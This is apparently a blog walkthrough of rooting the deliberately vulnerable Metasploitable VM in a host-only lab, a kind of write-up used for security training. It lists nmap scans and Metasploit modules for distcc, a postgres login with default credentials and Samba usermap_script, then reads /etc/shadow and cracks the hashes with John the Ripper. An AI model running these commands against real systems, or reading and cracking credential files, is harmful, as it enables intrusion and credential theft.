Pwning Metasploitable – Walkthrough

Metasploitable VM is vulnerable by design Linux box provided by Rapid7 to practice Metasploit framework. You can download it from vulnhub. I used Kali box and VMWare Player for this exercise also made sure that both VMs are set to host-only.

Now the purpose of Metasploitable is to find a way to root the box, and there are number of ways to do that, but it depends on your approach. It took me 3 exploits to r00t the box and am gona go thru all of them in the following section.

Fire up nmap to see what we have here.

nmap -p- -sT -A -sV -O -T4 -oN /root/Desktop/nmap_metasploitable.txt 192.168.68.144
nmap -p- -sT -A -sV -O -T4 -oN /root/Desktop/nmap_metasploitable.txt 192.168.68.144

Well, you can see there is a lot you can go after over here but am gona go with the easiest just because I’m lazy.

I’ll go after distccd v1 even though I don’t really know what it does. so I fired metasploit and searched for distccd and I was able to get shell with daemon privilege.

use exploit/unix/misc/distcc_exec set RHOST 192.168.68.144 exploit
use exploit/unix/misc/distcc_exec
set RHOST 192.168.68.144
exploit

However, we’re shooitng for r00t.

Next, I looked for postgres exploits and found one with excellent rating but you’d have to have username n password so I fired up Metasploit postgres login scanner and got hit on postgres:postgres, and then used it to exploit.

use auxiliary/scanner/postgres/postgres_login set RHOST 192.168.68.144 exploit use exploit/Linux/postgres/postgres_payload set RHOST 192.168.68.144 set PASSWORD postgres exploit
use auxiliary/scanner/postgres/postgres_login
set RHOST 192.168.68.144
exploit
use exploit/Linux/postgres/postgres_payload
set RHOST 192.168.68.144
set PASSWORD postgres
exploit

Again no rØØt shell. On to the next one.

Looked for all Samba exploits with excellent and Linux filter which lead me to usermap_script and BOOM! I got r00t shell.

use exploit/multi/samba/usermap_script set RHOST 192.168.68.144 exploit cat /etc/shadow cat /ect/passwd
use exploit/multi/samba/usermap_script
set RHOST 192.168.68.144
exploit
cat /etc/shadow
cat /ect/passwd

Finally decided to copy shadow and passwd hashes and give it a try, below are the list of usernames and passwords that John the Ripper cracked.

unshadow /root/Desktop/passwd.txt /root/Desktop/shadow.txt > meta_pw_dump.txt john /root/Desktop/meta_pw_dump.txt
unshadow /root/Desktop/passwd.txt /root/Desktop/shadow.txt > meta_pw_dump.txt
john /root/Desktop/meta_pw_dump.txt

Happy hunting!

Leave a Reply

Your email address will not be published. Required fields are marked *

CAPTCHA *